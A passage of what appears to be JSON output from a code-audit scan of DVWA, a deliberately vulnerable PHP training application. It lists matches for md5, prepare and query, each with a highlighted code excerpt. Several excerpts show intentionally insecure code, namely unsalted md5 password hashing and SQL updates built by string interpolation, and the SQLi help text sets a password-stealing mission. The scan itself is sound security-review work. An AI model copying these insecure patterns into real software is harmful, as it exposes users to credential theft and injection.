punctuation\">,</span> <span class=\"token variable\">$pass_new</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token variable\">$data</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">bindParam</span><span class=\"token punctuation\">(</span> <span class=\"token string\">':user'</span><span class=\"token punctuation\">,</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>PARAM_STR <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 28,
"start": 23,
"end": 34,
"severity": "unknown",
"note": ""
},
{
"id": 163,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 170,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update the database\n<span class=\"line-number\">17:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"'<span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">18:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> ",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 264,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$temp_file</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">''</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">sys_get_temp_dir</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$temp_file</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> DIRECTORY_SEPARATOR <span class=\"token punctuation\">.</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpeg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 265,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$temp_file</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">''</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">sys_get_temp_dir</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">ini_get</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'upload_tmp_dir'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">20:</span> \t<span class=\"token variable\">$temp_file</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> DIRECTORY_SEPARATOR <span class=\"token punctuation\">.</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'jpeg'</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">'png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">24:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">25:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">'image/jpeg'</span> || <span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">==</span> <span class=\"token string\">'image/png'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>",
"line": 20,
"start": 15,
"end": 26,
"severity": "unknown",
"note": ""
},
{
"id": 26,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\sprepare",
"match": "<span class=\"line-number\">463:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS_connError</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">464:</span> \t\t\t<span class=\"token function\">dvwaLogout</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">465:</span> \t\t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Unable to connect to the database.<br />'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$DBMS_errorFunc</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">466:</span> \t\t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">467:</span> \t\t}\n<span class=\"highlight\"><span class=\"line-number\">468:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> MySQL PDO Prepared Statements <span class=\"token punctuation\">(</span><span class=\"token keyword\">for</span> impossible levels<span class=\"token punctuation\">)</span></span>\n<span class=\"line-number\">469:</span> \t\t<span class=\"token variable\">$db</span> <span class=\"token operator\">=</span> new <span class=\"token function\">PDO</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mysql:host='</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'db_server'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>'<span class=\"token comment\" spellcheck=\"true\">;dbname=' . $_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]);</span>\n<span class=\"line-number\">470:</span> \t\t<span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">setAttribute</span><span class=\"token punctuation\">(</span>PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ATTR_ERRMODE<span class=\"token punctuation\">,</span> PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ERRMODE_EXCEPTION<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">471:</span> \t\t<span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">setAttribute</span><span class=\"token punctuation\">(</span>PDO<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span>ATTR_EMULATE_PREPARES<span class=\"token punctuation\">,</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">472:</span> \t}\n<span class=\"line-number\">473:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span> <span class=\"token punctuation\">)</span> {",
"line": 468,
"start": 463,
"end": 474,
"severity": "unknown",
"note": ""
},
{
"id": 228,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\"><</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\"><</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\"><</span>td<span class=\"token operator\">></span><span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 229,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
"filetype": "php",
"search": "\\squery",
"match": "<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>There are <span class=\"token number\">5</span> users <span class=\"token keyword\">in</span> the database<span class=\"token punctuation\">,</span> <span class=\"token keyword\">with</span> id's from <span class=\"token number\">1</span> <span class=\"token keyword\">to</span> <span class=\"token number\">5</span><span class=\"token punctuation\">.</span> Your mission<span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">to</span> steal their passwords via SQLi<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \n<span class=\"line-number\">24:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The SQL query uses RAW input that is directly controlled by the attacker<span class=\"token punctuation\">.</span> All they need <span class=\"token 